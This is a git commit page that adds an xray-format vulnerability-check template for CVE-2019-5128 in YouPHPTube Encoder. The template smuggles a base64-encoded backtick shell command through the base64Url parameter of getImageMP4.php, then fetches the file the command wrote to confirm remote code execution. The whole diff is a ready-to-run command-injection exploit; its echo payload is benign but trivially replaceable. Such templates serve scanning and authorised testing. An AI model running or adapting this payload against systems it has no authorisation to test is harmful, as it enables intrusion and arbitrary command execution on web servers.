优化xray解析模块,支持groups、新增poc

This commit is contained in:
影舞者
2021-11-16 14:42:35 +08:00
parent 858c28724b
commit b06d7ac94c
313 changed files with 4314 additions and 760 deletions
@@ -0,0 +1,20 @@
name: poc-yaml-youphptube-encoder-cve-2019-5128
set:
fileName: randomLowercase(4) + ".txt"
content: randomLowercase(8)
payload: urlencode(base64("`echo " + content + " > " + fileName + "`"))
rules:
- method: GET
path: /objects/getImageMP4.php?base64Url={{payload}}&format=jpg
follow_redirects: true
expression: |
response.status == 200
- method: GET
path: /objects/{{fileName}}
follow_redirects: true
expression: |
response.status == 200 && response.body.bcontains(bytes(content))
detail:
author: 0x_zmz(github.com/0x-zmz)
links:
- https://xz.aliyun.com/t/6708